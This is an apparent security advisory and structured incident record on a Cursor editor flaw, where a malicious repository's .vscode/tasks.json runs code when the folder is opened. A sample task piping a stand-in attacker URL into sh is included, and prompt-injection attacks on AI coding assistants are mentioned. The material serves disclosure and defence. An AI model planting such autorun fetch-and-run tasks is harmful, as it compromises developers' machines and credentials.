A critical security vulnerability was discovered in Cursor, an AI-powered fork of Visual Studio Code: because the editor ships with the Workspace Trust safeguard disabled by default, simply opening a maliciously crafted repository could trigger arbitrary code execution. Attackers could embed hidden *autorun* instructions in `.vscode/tasks.json`, causing code to run silently the moment the folder was opened. The flaw exposed users to supply chain attacks, risking credential leaks, unauthorized file modifications, and broader system compromise. It stemmed from a default configuration that prioritized convenience over security, leaving developers vulnerable to booby-trapped repositories hosted on platforms such as GitHub. Mitigations (e.g., enabling Workspace Trust, auditing untrusted repositories) were advised, but the flaw highlighted systemic risks in AI-driven development tools, where classical security oversights (e.g., misconfigurations, missing sandboxing) amplify the attack surface. It also underscored the broader trend of prompt injection and jailbreak risks in AI coding assistants, where malicious actors exploit trust gaps to bypass security reviews or execute unauthorized code.
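The auto-execution path described above abuses VS Code's task auto-run feature, which Cursor inherits. A minimal sketch of a booby-trapped `.vscode/tasks.json` (the command shown is an illustrative placeholder, not an actual observed payload):

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      // Illustrative payload only: fetches and runs attacker-controlled code
      "command": "curl -s https://attacker.example/payload | sh",
      "runOptions": {
        // Task fires automatically when the folder is opened
        "runOn": "folderOpen"
      }
    }
  ]
}
```

With Workspace Trust disabled, this task runs with no prompt as soon as the folder opens; with Workspace Trust enabled, the workspace opens in Restricted Mode and automatic tasks are blocked until the user explicitly trusts the folder. (`.vscode` configuration files accept JSON-with-comments, so the comments above are valid.)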
Source: https://thehackernews.com/2025/09/cursor-ai-code-editor-flaw-enables.html
TPRM report: https://www.rankiteo.com/company/anysphereinc
{
  "id": "any2753327100225",
  "linkid": "anysphereinc",
  "type": "Vulnerability",
  "date": "9/2025",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact involving customer data leaks"
}
{'affected_entities': [{'customers_affected': 'All Cursor users (especially '
'those opening untrusted '
'repositories)',
'industry': 'Technology (AI/Developer Tools)',
'name': 'Cursor',
'type': 'Software Vendor'},
{'customers_affected': 'Claude Code users (risk of '
'prompt injection, SQLi, '
'WebSocket bypass)',
'industry': 'Artificial Intelligence',
'location': 'United States',
'name': 'Anthropic',
'type': 'AI Company'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'Developers using AI-assisted tools',
'type': 'End Users'}],
'attack_vector': ['Malicious Repository (GitHub/other platforms)',
'Auto-execution via `.vscode/tasks.json` (Workspace Trust '
'disabled)',
'Prompt Injection in AI Code Assistants (Claude Code, etc.)',
'WebSocket Authentication Bypass (CVE-2025-52882)',
'SQL Injection (Postgres MCP)',
'Path Traversal (Microsoft NLWeb)',
'Open Redirect/Stored XSS (Base44)'],
'customer_advisories': ['Cursor users: Update settings to enable Workspace '
'Trust immediately.',
'Claude Code users: Review security advisories on '
'prompt injection.',
'Open-source maintainers: Audit repositories for '
'malicious `.vscode/` configurations.'],
'data_breach': {'data_exfiltration': 'Possible (via malicious tasks or prompt '
'injection)',
'file_types_exposed': ['.vscode/tasks.json',
'.env',
'Database configurations',
'System files (e.g., /etc/passwd)'],
'personally_identifiable_information': 'Potential (if '
'credentials include '
'PII)',
'sensitivity_of_data': 'High (includes authentication '
'secrets, proprietary code)',
'type_of_data_compromised': ['Credentials',
'Source code',
'System files',
'Environment variables',
'Project metadata']},
 'date_publicly_disclosed': '2025-10-01T00:00:00Z',
'description': 'A security weakness in the AI-powered code editor Cursor '
'allows arbitrary code execution when a maliciously crafted '
'repository is opened. The issue arises because Workspace '
'Trust (a VS Code security feature) is disabled by '
'default in Cursor, enabling attackers to auto-execute '
'malicious tasks via `.vscode/tasks.json` when a folder is '
'opened. This could lead to credential leaks, file '
'modifications, or broader system compromise. The '
'vulnerability exposes users to supply chain attacks via '
'booby-trapped repositories hosted on platforms like GitHub. '
'Users are advised to enable Workspace Trust, audit untrusted '
'repositories, and use alternative editors for suspicious '
'projects.\n'
'\n'
'The incident highlights broader risks in AI-powered coding '
'tools, including prompt injection/jailbreak attacks '
'(e.g., tricking Claude Code into ignoring vulnerabilities or '
'executing malicious test cases), WebSocket authentication '
'bypass (CVE-2025-52882), SQL injection in Postgres MCP, '
'path traversal in Microsoft NLWeb, and open '
'redirect/XSS in Base44. Anthropic and other vendors have '
'acknowledged these risks, emphasizing the need for '
'sandboxing, monitoring, and classical security controls in '
'AI-driven development environments.',
'impact': {'brand_reputation_impact': ['Erosion of trust in Cursor/Anthropic '
'security practices',
'Negative perception of AI-driven '
'development safety'],
'data_compromised': ['Sensitive credentials',
'Source code/files',
'System configurations (e.g., `/etc/passwd`)',
'Cloud credentials (.env files)',
'Project data (via AI tools like Claude '
'Code)'],
'identity_theft_risk': 'High (via credential leaks)',
'operational_impact': ['Compromised development environments',
'Malicious code pushed to production (via '
'tricked AI reviews)',
'Loss of trust in AI-assisted coding tools',
'Incident response overhead for affected '
'teams'],
'systems_affected': ['Cursor (AI-powered VS Code fork)',
'Claude Code (Anthropic)',
'Postgres MCP server',
'Microsoft NLWeb',
'Lovable (CVE-2025-48757)',
'Base44',
'Ollama Desktop',
'Developer workstations (via malicious '
'repositories)']},
'initial_access_broker': {'backdoors_established': 'Possible (via persistent '
'malicious tasks or AI '
'model poisoning)',
'data_sold_on_dark_web': 'Potential (stolen '
'credentials, code)',
'entry_point': ['Malicious repository (GitHub, '
'etc.) with crafted '
'`.vscode/tasks.json`',
'Prompt injection via external '
'files/websites (Claude Code)',
'WebSocket connection to '
'unauthenticated local server '
'(CVE-2025-52882)'],
'high_value_targets': ['Developer workstations',
'CI/CD pipelines',
'Cloud credentials (.env '
'files)',
'Proprietary codebases']},
'investigation_status': 'Ongoing (vendor patches pending; community awareness '
'raised)',
'lessons_learned': ['Default security settings in AI tools must prioritize '
'safety over convenience (e.g., Workspace Trust enabled '
'by default).',
'AI-assisted coding introduces novel attack vectors '
'(prompt injection, jailbreaks) that bypass traditional '
'controls.',
'Classical vulnerabilities (SQLi, XSS, path traversal) '
'remain critical even in AI-driven environments.',
'Sandboxing and input validation are essential for '
'AI-generated code/test cases.',
'Supply chain risks extend to AI model integrations '
'(e.g., MCP, Google APIs).',
'Developer education is key to mitigating social '
'engineering via malicious repositories.'],
'motivation': ['Supply chain compromise',
'Credential theft',
'Data exfiltration',
'System persistence',
'AI model manipulation (prompt injection)'],
'post_incident_analysis': {'corrective_actions': ['Cursor: Change default to '
'enable Workspace Trust.',
'Anthropic: Enhance prompt '
'injection defenses in '
'Claude Code.',
'Vendors: Patch '
'WebSocket/SQLi/path '
'traversal flaws.',
'Industry: Develop '
'standards for secure '
'AI-assisted development.',
'Community: Share '
'indicators of compromise '
'(IoCs) for malicious '
'repositories.'],
'root_causes': ['Insecure default settings '
'(Workspace Trust disabled in '
'Cursor).',
'Lack of input validation for AI '
'tool integrations (prompt '
'injection).',
'Insufficient sandboxing for '
'auto-executed tasks/code.',
'Classical vulnerabilities in '
'AI-adjacent components '
'(WebSocket, SQLi).',
'Over-reliance on user vigilance '
'for supply chain risks.']},
'recommendations': [{'for_developers': ['Enable Workspace Trust in Cursor and '
'similar IDEs.',
'Open untrusted repositories in '
'restricted editors first.',
'Audit `.vscode/tasks.json` and other '
'auto-execution configurations.',
'Monitor AI tools (e.g., Claude Code) '
'for unexpected behavior.',
'Use dedicated accounts/workspaces '
'for experimental AI-assisted '
'coding.']},
{'for_vendors': ['Ship products with secure defaults '
'(e.g., Workspace Trust enabled).',
'Implement robust sandboxing for '
'AI-generated code execution.',
'Add behavioral detection for prompt '
'injection attempts.',
'Conduct red-team exercises for AI tool '
'integrations.',
'Provide clear documentation on supply '
'chain risks (e.g., malicious '
'repositories).']},
{'for_organizations': ['Include AI tool risks in '
'third-party security assessments.',
'Restrict AI code assistants to '
'non-production environments where '
'possible.',
'Deploy network controls to limit '
'outbound connections from IDEs.',
'Train developers on AI-specific '
'threats (e.g., prompt injection).',
'Monitor for anomalous activity in '
'version control systems (e.g., '
'sudden malicious commits).']}],
 'references': [{'date_accessed': '2025-10-01',
                 'source': 'Oasis Security Analysis',
                 'url': 'https://oasis.security/blog/cursor-workspace-trust-vulnerability'},
                {'date_accessed': '2025-09-28',
                 'source': 'Checkmarx Report on AI Supply Chain Risks',
                 'url': 'https://checkmarx.com/blog/ai-driven-development-security-risks'},
                {'date_accessed': '2025-09-30',
                 'source': 'Anthropic Security Advisory (Claude Code)',
                 'url': 'https://anthropic.com/security/prompt-injection-risks'},
                {'date_accessed': '2025-10-02',
                 'source': 'Imperva Blog on AI Security Failures',
                 'url': 'https://imperva.com/blog/ai-driven-development-security-gaps'},
                {'date_accessed': '2025-10-01',
                 'source': 'CVE-2025-52882 (WebSocket Auth Bypass)',
                 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-52882'},
                {'date_accessed': '2025-09-29',
                 'source': 'CVE-2025-48757 (Lovable Authorization Bypass)',
                 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48757'}],
'response': {'communication_strategy': ['Public disclosure by Oasis '
'Security/Checkmarx',
'Anthropic advisories on prompt '
'injection risks',
'Imperva blog on classical security '
'failures in AI tools'],
'containment_measures': ['Enable Workspace Trust in Cursor',
'Audit repositories before opening in '
'Cursor',
'Use alternative editors for untrusted '
'projects',
'Monitor Claude Code for unexpected '
'data access',
'Sandbox AI-generated test cases'],
'enhanced_monitoring': ['Monitor AI tool interactions (e.g., '
'Claude Code file edits)',
'Log WebSocket connections in IDE '
'extensions'],
'remediation_measures': ['Cursor: Enable Workspace Trust by '
'default (pending)',
'Anthropic: Patch WebSocket auth bypass '
'(CVE-2025-52882)',
'Fix SQLi in Postgres MCP',
'Address path traversal in Microsoft '
'NLWeb',
'Mitigate open redirect/XSS in Base44',
'Improve cross-origin controls in '
'Ollama Desktop'],
'third_party_assistance': ['Oasis Security (vulnerability '
'analysis)',
'Checkmarx (supply chain security '
'report)']},
'stakeholder_advisories': ['Developers: Audit repositories and enable '
'Workspace Trust.',
'Security Teams: Monitor for AI tool abuses and '
'supply chain attacks.',
'Executives: Assess organizational exposure to '
'AI-driven development risks.'],
'title': 'Cursor AI-Powered Code Editor Arbitrary Code Execution '
'Vulnerability via Malicious Repository',
'type': ['Arbitrary Code Execution',
'Supply Chain Attack',
'Prompt Injection',
'Security Misconfiguration'],
'vulnerability_exploited': ['Disabled Workspace Trust in Cursor (VS Code '
'fork)',
'Auto-execution of `runOptions.runOn: '
"'folderOpen'` in tasks",
'Lack of sandboxing in AI-generated test cases '
'(Claude Code)',
'Incomplete cross-origin controls (Ollama '
'Desktop)',
'Incorrect authorization (Lovable, '
'CVE-2025-48757)',
'WebSocket auth bypass (CVE-2025-52882, CVSS: '
'8.8)',
'SQLi in Postgres MCP (bypassing read-only '
'restrictions)',
'Path traversal in Microsoft NLWeb (reading '
'`/etc/passwd`, `.env`)']}